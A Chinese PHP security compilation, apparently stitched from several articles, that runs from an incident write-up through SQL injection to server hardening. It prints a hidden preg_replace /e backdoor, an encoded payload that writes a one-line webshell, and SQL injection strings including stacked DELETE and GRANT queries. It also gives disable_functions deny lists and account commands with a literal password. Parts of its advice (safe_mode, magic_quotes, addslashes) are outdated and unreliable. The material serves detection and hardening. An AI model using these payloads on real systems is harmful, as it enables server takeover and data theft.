preg_replace隐藏后门和后续探究

php后门有很多，包子也见多了和玩多了，但是在一次帮助朋友检查服务器的时候，竟然发现这样的恶意代码。

事情是这样的，朋友的网站的利用各种查找后门的工具都没有发现php木马。老是找不到，小黑的伎俩很高级，每次使

用完毕总是把后门删掉，但是每次都能继续进来，总是找不到从哪进来的。这个着实让人蛋疼。

后来，终于在日志中发现一丝蛛丝马迹，通过我的分析，我发现一个IP总是很奇怪的POST数据到某个文件。然后一段

时间后，此IP就访问一个莫名奇妙文件，名字很显眼明显不是正常系统文件，而是PHP后门。但是很快使用完毕后门就

被删除了。

哈哈，遇到小黑蛮细心的。

然后通过分析发现，小黑的访问的文件发现代码：

代码如下	复制代码
@preg_replace("//e",$_POST['IN_COMSENZ'],"Access Denied");

如果你看到这个代码是不是有的也没什么问题，但是，这个就是小黑的掩藏的恶意代码和后门。隐蔽吧，基本上任何

查杀软件都查杀不到。

preg_replace函数原型：

mixed preg_replace ( mixed pattern, mixed replacement, mixed subject [, int limit])

特别说明：

/e 修正符使 preg_replace() 将 replacement 参数当作 PHP 代码(在适当的逆向引用替换完之后)。提示：要确保

replacement 构成一个合法的 PHP 代码字符串，否则 PHP 会在报告在包含 preg_replace() 的行中出现语法解析错

误。

上面的代码是POST接受数据要测试，比较麻烦，如果换成GET获取数据的话。。。

举例：

代码如下	复制代码
echo preg_replace("/test/e",$_GET["h"],"jutst test");

如果我们提交?h=phpinfo()，phpinfo()将会被执行(使用/e修饰符，preg_replace会将 replacement 参数当作 PHP

代码执行)。

如果我们要POST的话，我们测试提交下面的代码会怎么样呢?

代码如下

复制代码

?h=eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr (110).chr(40).chr(39).chr(100).chr(97).chr(116).chr(97).chr(47).chr(97).chr(46).chr(112).chr(104).chr (112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr (104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr (83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59))

密文对应的明文是：

代码如下	复制代码
fputs(fopen(data/a.php,w),);

执行的结果是在/data/目录下生成一个一句话木马文件 a.php。

这个就恐怖了吧。。。。

再来一个有难度的例子：

 

查看代码打印?

代码如下	复制代码
<?  function test($str)  {  }  echo preg_replace("/s*[php](.+?)[/php]s*/ies", 'test("1")', $_GET["h"]);  ?>

提交 ?h=[php]phpinfo()[/php]，phpinfo()会被执行吗?

肯定不会。因为经过正则匹配后， replacement 参数变为'test("phpinfo")'，此时phpinfo仅是被当做一个字符串参

数了。

有没有办法让它执行呢?

当然有。在这里我们如果提交?h=[php]{${phpinfo()}}[/php]，phpinfo()就会被执行。为什么呢?

在php中，双引号里面如果包含有变量，php解释器会将其替换为变量解释后的结果;单引号中的变量不会被处理。

注意：双引号中的函数不会被执行和替换。

在这里我们需要通过{${}}构造出了一个特殊的变量，'test("{${phpinfo()}}")'，达到让函数被执行的效果

(${phpinfo()}会被解释执行)。

可以先做如下测试：

echo "{${phpinfo()}}"; phpinfo会被成功执行了。

所以，各位查找后门的时候注意查找下。

OK，说了那么多，也了解了，以上我给的代码：

代码如下	复制代码
1 @preg_replace("//e",$_POST['IN_COMSENZ'],"Access Denied");

看似很正常的代码，其实就是一个极度危险的代码，隐藏颇深啊

SQL注入因为要操作数据库，所以一般会查找SQL语句关键字：insert、delete、update、select，查看传递的变量参数是否用户可控制，有无做过安全处理

SQL注入工作原理

构造一个数据库查询是一个非常直接的过程。典型地，它会遵循如下思路来实现。仅为说明问题，我们将假定你有一

个葡萄酒数据库表格”wines”，其中有一个字段为”variety”（即葡萄酒类型）：

1. 提供一个表单-允许用户提交某些要搜索的内容。让我们假定用户选择搜索类型为”lagrein”的葡萄酒。

2. 检索该用户的搜索术语，并且保存它-通过把它赋给一个如下所示的变量来实现：

代码如下	复制代码
$variety = $_POST['variety'];

因此，变量$variety的值现在为：

lagrein

3. 然后，使用该变量在WHERE子句中构造一个数据库查询：

代码如下	复制代码
$query = “SELECT * FROM wines WHERE variety=’$variety’”;

所以，变量$query的值现在如下所示：

代码如下	复制代码
SELECT * FROM wines WHERE variety=’lagrein’

4. 把该查询提交给MySQL服务器。

5. MySQL返回wines表格中的所有记录-其中，字段variety的值为”lagrein”。

到目前为止，这应该是一个你所熟悉的而且是非常轻松的过程。遗憾的是，有时我们所熟悉并感到舒适的过程却容易

导致我们产生自满情绪。现在，让我们再重新分析一下刚才构建的查询。

1. 你创建的这个查询的固定部分以一个单引号结束，你将使用它来描述变量值的开始：

代码如下	复制代码
$query = ” SELECT * FROM wines WHERE variety = ‘”;

2. 使用原有的固定不变的部分与包含用户提交的变量的值：

代码如下	复制代码
$query .= $variety;

3. 然后，你使用另一个单引号来连接此结果-描述该变量值的结束：

代码如下	复制代码
$ query .= “‘”;

于是，$query的值如下所示：

代码如下	复制代码
SELECT * FROM wines WHERE variety = ‘lagrein’

这个构造的成功依赖用户的输入。在本文示例中，你正在使用单个单词(也可能是一组单词)来指明一种葡萄酒类型。

因此，该查询的构建是无任何问题的，并且结果也会是你所期望的-一个葡萄酒类型为”lagrein”的葡萄酒列表。现

在，让我们想象，既然你的用户不是输入一个简单的类型为”lagrein”的葡萄酒类型，而是输入了下列内容(注意包

括其中的两个标点符号)：

代码如下	复制代码
lagrein’ or 1=1;

现在，你继续使用前面固定的部分来构造你的查询(在此，我们仅显示$query变量的结果值)：

代码如下	复制代码
SELECT * FROM wines WHERE variety = ‘

然后，你使用包含用户输入内容的变量的值与之进行连接(在此，以粗体显示)：

代码如下	复制代码
SELECT * FROM wines WHERE variety = ‘lagrein’ or 1=1;

最后，添加上下面的下引号：

代码如下	复制代码
SELECT * FROM wines WHERE variety = ‘lagrein’ or 1=1;’

缩合上述问题我们写一个函数，即可防止。

代码如下

复制代码

/** +---------------------------------------------------------- * 防挂马、防跨站攻击、防sql注入函数 +---------------------------------------------------------- *$date 传入的参数，要是个变量或者数组；$ignore_magic_quotes变量的魔术引用 +---------------------------------------------------------- */ function in($data,$ignore_magic_quotes=false) {  if(is_string($data))  {   $data=trim(htmlspecialchars($data));//防止被挂马，跨站攻击   if(($ignore_magic_quotes==true)||(!get_magic_quotes_gpc()))   {      $data = addslashes($data);//防止sql注入   }   return  $data;  }  else if(is_array($data))//如果是数组采用递归过滤  {   foreach($data as $key=>$value)   {     $data[$key]=in($value);   }   return $data;  }  else  {   return $data;  }  }

上面接受数据时我们就可以防止被挂马，跨站攻击,防止sql注入等待

下面来介绍在服务器端做安全配置

(1) 打开php的安全模式

php的安全模式是个非常重要的内嵌的安全机制，能够控制一些php中的函数，比如system()，

同时把很多文件操作函数进行了权限控制，也不允许对某些关键文件的文件，比如/etc/passwd，

但是默认的php.ini是没有打开安全模式的，我们把它打开：

safe_mode = on

(2) 用户组安全

当safe_mode打开时，safe_mode_gid被关闭，那么php脚本能够对文件进行访问，而且相同

组的用户也能够对文件进行访问。

建议设置为：

safe_mode_gid = off

如果不进行设置，可能我们无法对我们服务器网站目录下的文件进行操作了，比如我们需要

对文件进行操作的时候。

(3) 安全模式下执行程序主目录

如果安全模式打开了，但是却是要执行某些程序的时候，可以指定要执行程序的主目录：

代码如下	复制代码
safe_mode_exec_dir = D:/usr/bin

一般情况下是不需要执行什么程序的，所以推荐不要执行系统程序目录，可以指向一个目录，

然后把需要执行的程序拷贝过去，比如：

代码如下	复制代码
safe_mode_exec_dir = D:/tmp/cmd

但是，我更推荐不要执行任何程序，那么就可以指向我们网页目录：

代码如下	复制代码
safe_mode_exec_dir = D:/usr/www

(4) 安全模式下包含文件

如果要在安全模式下包含某些公共文件，那么就修改一下选项：

代码如下	复制代码
safe_mode_include_dir = D:/usr/www/include/

其实一般php脚本中包含文件都是在程序自己已经写好了，这个可以根据具体需要设置。

(5) 控制php脚本能访问的目录

使用open_basedir选项能够控制PHP脚本只能访问指定的目录，这样能够避免PHP脚本访问

不应该访问的文件，一定程度上限制了phpshell的危害，我们一般可以设置为只能访问网站目录：

代码如下	复制代码
open_basedir = D:/usr/www

(6) 关闭危险函数

如果打开了安全模式，那么函数禁止是可以不需要的，但是我们为了安全还是考虑进去。比如，

我们觉得不希望执行包括system()等在那的能够执行命令的php函数，或者能够查看php信息的

phpinfo()等函数，那么我们就可以禁止它们：

代码如下	复制代码
disable_functions = system,passthru,exec,shell_exec,popen,phpinfo

如果你要禁止任何文件和目录的操作，那么可以关闭很多文件操作

代码如下	复制代码
disable_functions = chdir,chroot,dir,getcwd,opendir,readdir,scandir,fopen,unlink,delete,copy,mkdir, rmdir,rename,file,file_get_contents,fputs,fwrite,chgrp,chmod,chown

以上只是列了部分不叫常用的文件处理函数，你也可以把上面执行命令函数和这个函数结合，

就能够抵制大部分的phpshell了。

(7) 关闭PHP版本信息在http头中的泄漏

我们为了防止黑客获取服务器中php版本的信息，可以关闭该信息斜路在http头中：

代码如下	复制代码
expose_php = Off

比如黑客在 telnet www.12345.com 80 的时候，那么将无法看到PHP的信息。

(8) 关闭注册全局变量

在PHP中提交的变量，包括使用POST或者GET提交的变量，都将自动注册为全局变量，能够直接访问，

这是对服务器非常不安全的，所以我们不能让它注册为全局变量，就把注册全局变量选项关闭：

代码如下	复制代码
register_globals = Off

当然，如果这样设置了，那么获取对应变量的时候就要采用合理方式，比如获取GET提交的变量var，

那么就要用$_GET['var']来进行获取，这个php程序员要注意。

(9) 打开magic_quotes_gpc来防止SQL注入

SQL注入是非常危险的问题，小则网站后台被入侵，重则整个服务器沦陷，

所以一定要小心。php.ini中有一个设置：

代码如下	复制代码
magic_quotes_gpc = Off

这个默认是关闭的，如果它打开后将自动把用户提交对sql的查询进行转换，

比如把 ' 转为 '等，这对防止sql注射有重大作用。所以我们推荐设置为：

代码如下	复制代码
magic_quotes_gpc = On

(10) 错误信息控制

一般php在没有连接到数据库或者其他情况下会有提示错误，一般错误信息中会包含php脚本当

前的路径信息或者查询的SQL语句等信息，这类信息提供给黑客后，是不安全的，所以一般服务器建议禁止错误提示：

代码如下	复制代码
display_errors = Off

如果你却是是要显示错误信息，一定要设置显示错误的级别，比如只显示警告以上的信息：

代码如下	复制代码
error_reporting = E_WARNING & E_ERROR

当然，我还是建议关闭错误提示。

(11) 错误日志

建议在关闭display_errors后能够把错误信息记录下来，便于查找服务器运行的原因：

代码如下	复制代码
log_errors = On

同时也要设置错误日志存放的目录，建议根apache的日志存在一起：

代码如下	复制代码
error_log = D:/usr/local/apache2/logs/php_error.log

注意：给文件必须允许apache用户的和组具有写的权限。

MYSQL的降权运行

新建立一个用户比如mysqlstart

代码如下	复制代码
net user mysqlstart fuckmicrosoft /add net localgroup users mysqlstart /del

不属于任何组

如果MYSQL装在d:mysql ，那么，给 mysqlstart 完全控制 的权限

然后在系统服务中设置，MYSQL的服务属性，在登录属性当中，选择此用户 mysqlstart 然后输入密码，确定。

重新启动 MYSQL服务，然后MYSQL就运行在低权限下了。

如果是在windos平台下搭建的apache我们还需要注意一点，apache默认运行是system权限，

这很恐怖，这让人感觉很不爽.那我们就给apache降降权限吧。

代码如下	复制代码
net user apache fuckmicrosoft /add net localgroup users apache /del

ok.我们建立了一个不属于任何组的用户apche。

我们打开计算机管理器，选服务，点apache服务的属性，我们选择log on，选择this account，我们填入上面所建立

的账户和密码，

重启apache服务，ok，apache运行在低权限下了。

实际上我们还可以通过设置各个文件夹的权限，来让apache用户只能执行我们想让它能干的事情，给每一个目录建立

一个单独能读写的用户

本文章从程序到数据库及最后的WEB服务器的配置都有讲述，大家参考本文章之后应该要安全了很多了哦，一般的注入

是没办法实现了。

在PHP5.3以下版本都会有安全模式safe_mode这个功能，只是默认状态都是关闭safe_mode安全模式的，下面我来介绍一下具体关于safe_mode开启与对系统的影响。

开启PHP安全模式（请注意，PHP5.3将不再有安全模式）

打开或者关闭php的安全模式是利用php.ini中的safe_mode选项：

代码如下	复制代码
safe_mode=On(使用安全模式) safe_mode=Off(关闭安全模式) 在apache的httpd.conf中VirtualHost的相应设置方法 php_admin_flag safe_mode On(使用安全模式) php_admin_flag safe_mode Off(关闭安全模式) 或者： php_admin_value safe_mode1(使用安全模式) php_admin_value safe_mode0(关闭安全模式)

当安全模式打开的时候，以下函数列表的功能将会受到限制：

函数名	限制
dbmopen()	检查被操作的文件或目录是否与正在执行的脚本有相同的 UID（所有者）。
dbase_open()	检查被操作的文件或目录是否与正在执行的脚本有相同的 UID（所有者）。
filepro()	检查被操作的文件或目录是否与正在执行的脚本有相同的 UID（所有者）。
filepro_rowcount()	检查被操作的文件或目录是否与正在执行的脚本有相同的 UID（所有者）。
filepro_retrieve()	检查被操作的文件或目录是否与正在执行的脚本有相同的 UID（所有者）。
ifx_*	sql_safe_mode 限制, (!= safe mode)
ingres_*	sql_safe_mode 限制, (!= safe mode)
mysql_*	sql_safe_mode 限制, (!= safe mode)
pg_loimport()	检查被操作的文件或目录是否与正在执行的脚本有相同的 UID（所有者）。
posix_mkfifo()	检查被操作的目录是否与正在执行的脚本有相同的 UID（所有者）。
putenv()	遵循 ini 设置的 safe_mode_protected_env_vars 和 safe_mode_allowed_env_vars 选项。请参考 putenv() 函数的有关文档。
move_uploaded_file()	检查被操作的文件或目录是否与正在执行的脚本有相同的 UID（所有者）。
chdir()	检查被操作的目录是否与正在执行的脚本有相同的 UID（所有者）。
dl()	本函数在安全模式下被禁用。
backtick operator	本函数在安全模式下被禁用。
shell_exec()（在功能上和 backticks 函数相同）	本函数在安全模式下被禁用。
exec()	只能在 safe_mode_exec_dir 设置的目录下进行执行操作。基于某些原因，目前不能在可执行对象的路径中使用 ..。escapeshellcmd() 将被作用于此函数的参数上。
system()	只能在 safe_mode_exec_dir 设置的目录下进行执行操作。基于某些原因，目前不能在可执行对象的路径中使用 ..。escapeshellcmd() 将被作用于此函数的参数上。
passthru()	只能在 safe_mode_exec_dir 设置的目录下进行执行操作。基于某些原因，目前不能在可执行对象的路径中使用 ..。escapeshellcmd() 将被作用于此函数的参数上。
popen()	只能在 safe_mode_exec_dir 设置的目录下进行执行操作。基于某些原因，目前不能在可执行对象的路径中使用 ..。escapeshellcmd() 将被作用于此函数的参数上。
fopen()	检查被操作的目录是否与正在执行的脚本有相同的 UID（所有者）。
mkdir()	检查被操作的目录是否与正在执行的脚本有相同的 UID（所有者）。
rmdir()	检查被操作的目录是否与正在执行的脚本有相同的 UID（所有者）。
rename()	检查被操作的文件或目录是否与正在执行的脚本有相同的 UID（所有者）。 检查被操作的目录是否与正在执行的脚本有相同的 UID（所有者）。
unlink()	检查被操作的文件或目录是否与正在执行的脚本有相同的 UID（所有者）。 检查被操作的目录是否与正在执行的脚本有相同的 UID（所有者）。
copy()	检查被操作的文件或目录是否与正在执行的脚本有相同的 UID（所有者）。 检查被操作的目录是否与正在执行的脚本有相同的 UID（所有者）。 (on source and target)
chgrp()	检查被操作的文件或目录是否与正在执行的脚本有相同的 UID（所有者）。
chown()	检查被操作的文件或目录是否与正在执行的脚本有相同的 UID（所有者）。
chmod()	检查被操作的文件或目录是否与正在执行的脚本有相同的 UID（所有者）。 另外，不能设置 SUID、SGID 和 sticky bits
touch()	检查被操作的文件或目录是否与正在执行的脚本有相同的 UID（所有者）。 检查被操作的目录是否与正在执行的脚本有相同的 UID（所有者）。
symlink()	检查被操作的文件或目录是否与正在执行的脚本有相同的 UID（所有者）。 检查被操作的目录是否与正在执行的脚本有相同的 UID（所有者）。 （注意：仅测试 target）
link()	检查被操作的文件或目录是否与正在执行的脚本有相同的 UID（所有者）。 检查被操作的目录是否与正在执行的脚本有相同的 UID（所有者）。 （注意：仅测试 target）
apache_request_headers()	在安全模式下，以“authorization”（区分大小写）开头的标头将不会被返回。
header()	在安全模式下，如果设置了 WWW-Authenticate，当前脚本的 uid 将被添加到该标头的 realm 部分。
PHP_AUTH 变量	在安全模式下，变量 PHP_AUTH_USER、PHP_AUTH_PW 和 PHP_AUTH_TYPE 在 $_SERVER 中不可用。但无论如何，您仍然可以使用 REMOTE_USER 来获取用户名称（USER）。（注意：仅 PHP 4.3.0 以后有效）
highlight_file(), show_source()	检查被操作的文件或目录是否与正在执行的脚本有相同的 UID（所有者）。 检查被操作的目录是否与正在执行的脚本有相同的 UID（所有者）。 （注意，仅在 4.2.1 版本后有效）
parse_ini_file()	检查被操作的文件或目录是否与正在执行的脚本有相同的 UID（所有者）。 检查被操作的目录是否与正在执行的脚本有相同的 UID（所有者）。 （注意，仅在 4.2.1 版本后有效）
set_time_limit()	在安全模式下不起作用。
max_execution_time	在安全模式下不起作用。
mail()	在安全模式下，第五个参数被屏蔽。（注意，仅自 PHP 4.2.3 起受影响）

同样的，一些php扩展中的函数也将会受到影响。(加载模块：在安全模式下dl函数将被禁止，如果要加载扩展的话，只能修改php.ini中的扩展选项，在php启动的时候加载)

在php安全模式打开的时候，需要执行系统程序的时候，必须是在safe_mode_exec_dir选项指定目录的程序，否则执行将失败。即使允许执行，那么也会自动的传递给escapeshellcmd函数进行过滤。

以下执行命令的函数列表将会受到影响：

exec,shell_exec,passthru,system,popen

另外，背部标记操作符(`)也将被关闭。

当运行在安全模式下，虽然不会引起错误，但是putenv函数将无效。同样的，其他一些尝试改变php环境变量的函数set_time_limit, set_include_path也将被忽略。

安全模式后的影响：
当函数在访问文件系统的时候将进行文件所有者的检查。缺省情况下，会检查该文件所有者的用户id，当你能够修改文件所有者的组id(gid)为safe_mode_gid选项所指定的。

如果你有一个共享库文件在你的系统上，当你碰到需要include或require的时候，那么你可以使用safe_mode_include_dir选项来设置你的路径，保证你的代码正常工作。(包含路径：如果你想要使用safe_mode_include_dir选项包含更多的包含路径，那么你可以象include_path选项一样，在unix/linux系统下使用冒号进行分割，在windows下使用分号进行分割)

比如你想要在安全模式下包含/usr/local/include/php下的文件，那么你可以设置选项为：

safe_mode_include_dir=/usr/local/include/php

如果你的包含的文件是需要执行的，那么你可以设置safe_mode_exec_dir选项。
比如你需要/usr/local/php-bin路径下的文件是可以执行的，那么可以设置选项为：

safe_mode_exec_dir=/usr/local/php-bin

(可执行：如果你执行的程序在/usr/bin目录下，那么你可以把这些的二进制文件，连接到你指定选项下能够执行的路径)

如果你想设置某些环境变量，那么可以使用safe_mode_allowed_env_vars选项。这个选项的值是一个环境变量的前缀，缺省是允许php_开头的环境变量，如果你想要改变，可以设置该选项的值，多个环境变量前缀之间使用逗号进行分割。

比如下面允许时区的环境变量tz，那么修改该选项的值为：

safe_mode_allowed_env_vars=php_,tz

除了安全模式以外，php还提供了许多其他许多特征来保证php的安全。

1、[隐藏php的版本号]

你能够在php.ini里使用expose_php选项来防止web服务器泄露php的报告信息。如下：

expose_php=on

利用整个设置，你能够阻碍一些来自自动脚本针对web服务器的攻击。通常情况下，http的头信息里面包含了如下信息：

server:apache/1.3.33(unix)php/5.2.4mod_ssl/2.8.16openssl/0.9.7c

在expose_php选项打开以后，php的版本信息将不包含在上面的头信息里。

当然，用户访问网站的时候同样能够看到.php的文件扩展名。如果你想整个的使用不同的文件扩展名，你需要在httpd.conf中找到如下这行：

addtype application/x-httpd.php

你就可以修改.php为任何你喜欢的文件扩展名。你能够指定任意多个的文件扩展名，中间使用空格进行分割。如果你想在服务器端使用php来解析.html和.htm文件的时候，那么你设置选项如下：

addtype application/x-httpd.html.htm

(解析html：配置你的web服务器使用php去解析所有的html文件，但是如果非服务器端代码也需要php去解析，会影响服务器的性能。静态页面你可以使用不同的扩展名，这样能够消除对php脚本引擎的依赖，增强性能。)

2、[文件系统安全]

安全模式限制了脚本所有者只能访问属于自己的文件，但是你可以使用open_basedir选现来指定一个你必须访问的目录。如果你指定了一个目录，php将拒绝访问除了该目录和该目录子目录的其他目录。open_basedir选项能够工作在安全模式之外。

限制文件系统只能访问/tmp目录，那么设置选项为：

open_basedir=/tmp

3、[函数访问控制]

你能够在disable_functions选项中使用逗号分割来设定函数名，那么这些函数将在php脚本中被关闭。这个设置能够工作在安全模式之外。

disable_functions=dl

当然，同样的你能够使用disable_classes选项来关闭对一些类的访问。

4、[数据库安全]

假设你的php脚本中包含一个基于表单值来执行的mysql查询：

$sql=”update mytable set col1=”.$_post["value"].”where col2=’somevalue’”;

$res=mysql_query($sql,$db);

你希望$_post["value"]包含一个整数值来更新你的列col1。可是，一个恶意用户能够输入一个分号在表单字段里，接着，是一段他/她想被任意执行的sql语句。

举例，假设下面是$_post["value"]提交的值：

0;insert into admin_users(username,password) values (‘me’,'mypassword’);

那么当这个查询发送给mysql查询的时候，那么就变成了下面这条sql：

update mytable set col1=0;

insert into admin_users(username,password) values (‘me’,'mypassword’);

where col2=’somevalue’;

这明显是一个有害的查询！首先这个查询会在mytable表里更新col1。这个并没有什么麻烦的，但是第二个表达式，它将执行insert表达式来插入一个能登陆的新管理员。第三个表达式就废弃了，但同时sql解析器将抛出一个错误，这个有害的查询才完成。这个攻击就是大家常说的sql injection（注：sql注入）。

当然，sql injection存在一个问题，对方必须了解你的数据库结构。在这个例子中，攻击者是知道你有一个表admin_users，并且知道包含username和password字段，同时，存储的密码是没有加密的。

除了你自己，一般的网站访问者是不知道这些关于数据库的信息。可是，如果你使用了一个开发源代码的在线电子商务程序，或者使用一个自由的讨论版程序，这些数据表的定义都是已知的，或者有一些用户能够访问到你的数据库。

此外，你的脚本输出会提示一个查询错误，这些信息里包含了很多关于数据库结构的重要信息。在一个正常工作的网站上，你应该考虑设置display_errors选项为off，并且使用log_errors来代替display_errors，把警告和错误信息插入到文件中。

(数据库权限：它是一个非常重要的东西，你只有正确的权限，才能通过脚本正确的连接数据库。你应该不要在脚本中使用管理员去连接数据库。如果你这么做，那么一个攻击者将可能获取全部的数据库权限，并且包括其他相同服务器的权限。攻击者将可能运行grant或create user命令来获取更多的访问权限。)

如果你要防止sql injection攻击，你必须保证用户表单里提交的内容不是一个能够执行的sql表达式。

前一个例子中，我们使用一个整型值来进行更新。如果在单引号后面跟上一个字符串，这个攻击者在分号之前必须提交一个闭合的引用在整个sql表达式中。可是，当magic_quotes_gpc选项是开启的时候，在web表单中提交的引号将自动被转义。

为了防止被恶意的攻击者进行sql injection攻击，你应该总是确认提交的数据是合法的。如果你需要的是一个整数值，那么你可以使用is_numeric函数来测试这个表达值，或者使用settype函数来转换为一个数字，清除任何一个傻傻的sql语句。

如果你开发的程序需要几个提交的值在一个sql表达式里，你能够使用sprintf函数来构建一个sql字符串，使用格式化字符来指示数据类型的每个值。看下面的例子：

$sql=sprintf(“update mytable set col1=%d where col2=’%s’”, $_post["number"], mysql_escape_string($_post["string"]));

在上一个例子中，整个mysql的数据已经被使用，所以这个字符串已经通过mysql_escape_string函数进行过滤。对于其他数据库，你可以使用addslashes函数进行转义，或者使用其他方法

在程序开发中sql注入是一个大家常常会要考虑到的问题，下面我来解析一下常见的sql防注入代码，有需要的朋友可参考参考。

1、php提交数据过滤的基本原则 

1）提交变量进数据库时，我们必须使用addslashes()进行过滤，像我们的注入问题，一个addslashes()也就搞定了。其实在涉及到变量取值时，intval()函数对字符串的过滤也是个不错的选择。

2）在php.ini中开启magic_quotes_gpc和magic_quotes_runtime。magic_quotes_gpc可以把get,post,cookie里的引号变为斜杠。magic_quotes_runtime对于进出数据库的数据可以起到格式话的作用。其实，早在以前注入很疯狂时，这个参数就很流行了。

代码如下

复制代码

<? if ( isset($_POST["f_login"] ) ) {   // 连接数据库...   // ...代码略...     // 检查用户是否存在   $t_strUname = $_POST["f_uname"];   $t_strPwd = $_POST["f_pwd"];   $t_strSQL = "SELECT * FROM tbl_users WHERE username='$t_strUname' AND password = '$t_strPwd' LIMIT 0,1";   if ( $t_hRes = mysql_query($t_strSQL) )   {     // 成功查询之后的处理. 略...   } } ?> <html><head><title>sample test</title></head> <body> <form method=post action="">   Username: <input type="text" name="f_uname" size=30><br>   Password: <input type=text name="f_pwd" size=30><br>   <input type="submit" name="f_login" value="登录"> </form> </body>

3）在使用系统函数时，必须使用escapeshellarg(),escapeshellcmd()参数去过滤，这样你也就可以放心的使用系统函数。

4）对于跨站，strip_tags(),htmlspecialchars()两个参数都不错，对于用户提交的的带有html和php的标记都将进行转换。比如尖括号"<"就将转化为 "<"这样无害的字符。

代码如下	复制代码
$new = htmlspecialchars("<a href='test'>Test</a>", ENT_QUOTES); strip_tags($text,);

5）对于相关函数的过滤，就像先前的include(),unlink,fopen()等等，只要你把你所要执行操作的变量指定好或者对相关字符过滤严密，我想这样也就无懈可击了。

2、PHP简单的数据过滤

1）入库:  trim($str),addslashes($str)
2）出库:  stripslashes($str)
3）显示:  htmlspecialchars(nl2br($str))

一、 注入式攻击的类型

可能存在许多不同类型的攻击动机，但是乍看上去，似乎存在更多的类型。这是非常真实的-如果恶意用户发现了一个能够执行多个查询的办法的话。本文后面，我们会对此作详细讨论。
如
果你的脚本正在执行一个SELECT指令，那么，攻击者可以强迫显示一个表格中的每一行记录-通过把一个例如"1=1"这样的条件注入到WHERE子句中，如下所示(其中，注入部分以粗体显示)：

代码如下	复制代码
SELECT * FROM wines WHERE variety = 'lagrein' OR 1=1;'

正如我们在前面所讨论的，这本身可能是很有用的信息，因为它揭示了该表格的一般结构(这是一条普通的记录所不能实现的)，以及潜在地显示包含机密信息的记录。
一条更新指令潜在地具有更直接的威胁。通过把其它属性放到SET子句中，一名攻击者可以修改当前被更新的记录中的任何字段，例如下面的例子（其中，注入部分以粗体显示）：

代码如下	复制代码
UPDATE wines SET type='red'，'vintage'='9999' WHERE variety = 'lagrein'

通过把一个例如1=1这样的恒真条件添加到一条更新指令的WHERE子句中，这种修改范围可以扩展到每一条记录，例如下面的例子（其中，注入部分以粗体显示）：

代码如下	复制代码
UPDATE wines SET type='red'，'vintage'='9999 WHERE variety = 'lagrein' OR 1=1;'

最危险的指令可能是DELETE-这是不难想像的。其注入技术与我们已经看到的相同-通过修改WHERE子句来扩展受影响的记录的范围，例如下面的例子（其中，注入部分以粗体显示）：
 

代码如下	复制代码
DELETE FROM wines WHERE variety = 'lagrein' OR 1=1;'

二、 多个查询注入
多个查询注入将会加剧一个攻击者可能引起的潜在的损坏-通过允许多条破坏性指令包括在一个查询中。在使用MySQL数据库时，攻击者通过把一个出乎意料之外的终止符插入到查询中即可很容易实现这一点-此时一个注入的引号(单引号或双引号)标记期望变量的结尾；然后使用一个分号终止该指令。现在，一个另外的攻击指令可能被添加到现在终止的原始指令的结尾。最终的破坏性查询可能看起来如下所示：
代码如下:

代码如下	复制代码
SELECT * FROM wines WHERE variety = 'lagrein'; GRANT ALL ON *.* TO 'BadGuy@%' IDENTIFIED BY 'gotcha';'

这个注入将创建一个新的用户BadGuy并赋予其网络特权（在所有的表格上具有所有的特权）；其中，还有一个"不祥"的口令被加入到这个简单的SELECT语句中。如果你遵循我们在以前文章中的建议－严格限制该过程用户的特权，那么，这应该无法工作，因为web服务器守护程序不再拥有你撤回的GRANT特权。但是从理论上讲，这样的一个攻击可能给予BadGuy自由权力来实现他对你的数据库的任何操作。

下面分享一个自己写的

代码如下

复制代码

function phpsql_show($str){  $str = stripslashes($str);  $str = str_replace("&#92;", "", $str);  $str = str_replace("&#47;", "/", $str);  $str = str_replace("&#32;", " ", $str);  $str = str_replace("&#44;", ",", $str);  return $str; } function phpsql_post($str){  $str = stripslashes($str);  $str = str_replace("|", "&#124;", $str);  $str = str_replace("<", "&#60;", $str);  $str = str_replace(">", "&#62;", $str);  $str = str_replace("&nbsp;", "&#32;", $str);  $str = str_replace(" ", "&#32;", $str);  $str = str_replace("(", "&#40;", $str);  $str = str_replace(")", "&#41;", $str);  $str = str_replace("`", "&#96;", $str);  //$str = str_replace("'", "&#39;", $str);  $str = str_replace('"', "&#34;", $str);  $str = str_replace(",", "&#44;", $str);  $str = str_replace("$", "&#36;", $str);  $str = str_replace("", "&#92;", $str);  $str = str_replace("/", "&#47;", $str);  return $str; } function phpsql_replace($str){  $str = stripslashes($str);  $str = str_replace("'", "&#39;", $str);  return $str; }

总结一下：

* addslashes() 是强行加；
* mysql_real_escape_string() 会判断字符集，但是对PHP版本有要求；
* mysql_escape_string不考虑连接的当前字符集。

dz中的防止sql注入就是用addslashes这个函数，同时在dthmlspecialchars这个函数中有进行一些替换$string = preg_replace(/&((#(d{3,5}|x[a-fA-F0-9]{4}));)/, &1,这个替换解决了注入的问题，同时也解决了中文乱码的一些问题

在我们做留言板时经常会需要去屏蔽关键字一些关键字，下面我来介绍利用txt保存要屏蔽关键字，然后再根据用户提交的数据进行过滤。

先看strpos函数

strpos() 函数返回字符串在另一个字符串中第一次出现的位置。

如果没有找到该字符串，则返回 false。

语法

strpos(string,find,start)参数 描述
string 必需。规定被搜索的字符串。
find 必需。规定要查找的字符。
start 可选。规定开始搜索的位置。

提示和注释

注释：该函数对大小写敏感。如需进行对大小写不敏感的搜索，请使用 stripos() 函数。

例子

代码如下	复制代码
<?php echo strpos("Hello world!","wo"); ?>

一、把关键字专门写在一个文本文件里，每行一个，数量不限，有多少写多少。

二、PHP读取关键字文本，存入一个数组

三、遍历关键字数组，挨个用strpos函数去看看内容有没有关键字，如果有，返回true,没有则返回false

PHP代码如下

代码如下

复制代码

